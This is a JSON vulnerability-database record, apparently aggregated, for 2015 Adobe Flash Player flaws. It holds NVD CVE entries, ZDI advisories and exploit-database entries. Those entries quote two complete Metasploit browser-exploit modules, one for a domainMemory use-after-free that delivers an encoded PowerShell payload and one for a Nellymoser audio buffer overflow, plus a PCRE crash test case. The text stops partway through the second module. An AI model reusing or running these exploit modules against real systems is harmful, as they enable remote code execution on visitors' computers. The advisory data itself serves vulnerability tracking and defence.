"cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3042, and CVE-2015-3043.", 
"edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3041", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3041"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", 
"cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3041", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3041", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", 
"description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, and CVE-2015-3043.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0347", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0347"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", 
"cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0347", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0347", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2020-06-22T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2015-0347"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AVSource objects. By sending a specially crafted SWF an attacker can force a memory corruption condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2015-06-22T00:00:00", "published": "2015-04-15T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-133/", "id": "ZDI-15-133", "title": "Adobe Flash Player AVSource Memory Corruption Remote Code Execution Vulnerability ", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:48", "bulletinFamily": "info", "cvelist": ["CVE-2015-3039"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of AS2 ConvolutionFilter objects. 
By manipulating the matrix property of a ConvolutionFilter object, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2015-06-22T00:00:00", "published": "2015-07-08T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-293/", "id": "ZDI-15-293", "title": "Adobe Flash Player AS2 ConvolutionFilter Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:50", "bulletinFamily": "info", "cvelist": ["CVE-2015-0349"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of AS3 ConvolutionFilter objects. By manipulating the matrix property of a ConvolutionFilter object, an attacker can force a dangling pointer to be reused after it has been freed. 
An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2015-06-22T00:00:00", "published": "2015-04-15T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-134/", "id": "ZDI-15-134", "title": " (Pwn2Own) Adobe Flash Player AS3 ConvolutionFilter Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-02T19:07:40", "description": "Exploit for windows platform in category remote exploits", "edition": 2, "published": "2015-05-08T00:00:00", "type": "zdt", "title": "Adobe Flash Player domainMemory ByteArray Use After Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2015-05-08T00:00:00", "id": "1337DAY-ID-23606", "href": "https://0day.today/exploit/description/23606", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Adobe Flash Player. The\r\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\r\n is freed from an ActionScript worker, when forcing a reallocation by copying more\r\n contents than the original capacity, but Flash forgets to update the domainMemory\r\n pointer, leading to a use-after-free situation when the main worker references the\r\n domainMemory again. 
This module has been tested successfully on Windows 7 SP1\r\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery according to Flash Advisory\r\n 'Unknown', # Exploit in the wild\r\n 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-0359'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],\r\n ['URL', 'https://git.hacklab.kr/snippets/13'],\r\n ['URL', 'http://pastebin.com/Wj3NViUu']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n \r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n \r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + 
rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n \r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n \r\n swf\r\n end\r\n \r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23606"}, {"lastseen": "2018-01-05T07:14:54", "edition": 2, "description": "Exploit for windows platform in category dos / poc", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3042"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24086", "href": "https://0day.today/exploit/description/24086", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\nThere\u2019s an error in the PCRE engine version used in Flash that allows the 
execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.\r\n \r\nThis issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.\r\n \r\nThe issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.\r\n \r\nSimplest testcase that will crash in an ASAN build is the following:\r\n \r\n(?(?<a>)?)\r\n \r\nThis is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.\r\n \r\nRegardless, we emit the following bytecode:\r\n \r\n0000 5d0012 93 BRA [18]\r\n0003 5f000c 95 COND [12]\r\n0006 66 102 BRAZERO \r\n0007 5e00050001 94 CBRA [5, 1]\r\n000c 540005 84 KET [5]\r\n000f 54000c 84 KET [12]\r\n0012 540012 84 KET [18]\r\n0015 00 0 END \r\n \r\nWhen this is executed, we reach the following code:\r\n \r\n/* The condition is an assertion. Call match() to evaluate it - setting\r\nthe final argument match_condassert causes it to stop at the end of an\r\nassertion. 
*/\r\n \r\nelse\r\n {\r\n RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,\r\n match_condassert, RM3);\r\n if (rrc == MATCH_MATCH)\r\n {\r\n condition = TRUE;\r\n ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n while (*ecode == OP_ALT) ecode += GET(ecode, 1); <---- ecode is out of bounds at this point.\r\n \r\nIf we look at the execution trace for this expression, we can see where this code goes wrong:\r\n \r\nexec 0x600e0000dfe4 93 [0x60040000dfd0 41]\r\nexec 0x600e0000dfe7 95 [0x60040000dfd0 41]\r\nexec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match\r\nexec 0x600e0000dfeb 94 [0x60040000dfd0 41]\r\nexec 0x600e0000dff0 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff3 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff6 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff9 0 [0x60040000dfd0 41] <--- recursive match returns\r\nbefore 0x600e0000dfe7 24067 <--- ecode == 0x...dfe7\r\nafter 0x600e00013dea\r\n \r\nIf we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. 
Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.\r\n \r\necode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n \r\nIn this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.\r\n \r\nSee attached for a crash PoC for the latest Chrome/Flash on x64 linux.\r\n \r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24086"}, {"lastseen": "2018-01-06T03:00:59", "edition": 2, "description": "Exploit for multiple platform in category remote exploits", "published": "2015-07-09T00:00:00", "type": "zdt", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043"], "modified": "2015-07-09T00:00:00", "id": "1337DAY-ID-23847", "href": "https://0day.today/exploit/description/23847", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\r\n encoded audio 
inside a FLV video, as exploited in the wild on June 2015. This module\r\n has been tested successfully on:\r\n \r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\r\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\r\n \r\n Note that this exploit is effective against both CVE-2015-3113 and the\r\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\r\n to the same root cause as CVE-2015-3043.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3043'],\r\n ['CVE', '2015-3113'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\r\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n \r\n false\r\n end,\r\n :flash => lambda do 
|ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\r\n end\r\n \r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 23 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n \r\n def exploit\r\n @swf = create_swf\r\n @flv = create_flv\r\n \r\n super\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n \r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n if request.uri =~ /\\.flv$/\r\n print_status('Sending FLV...')\r\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n \r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n \r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" 
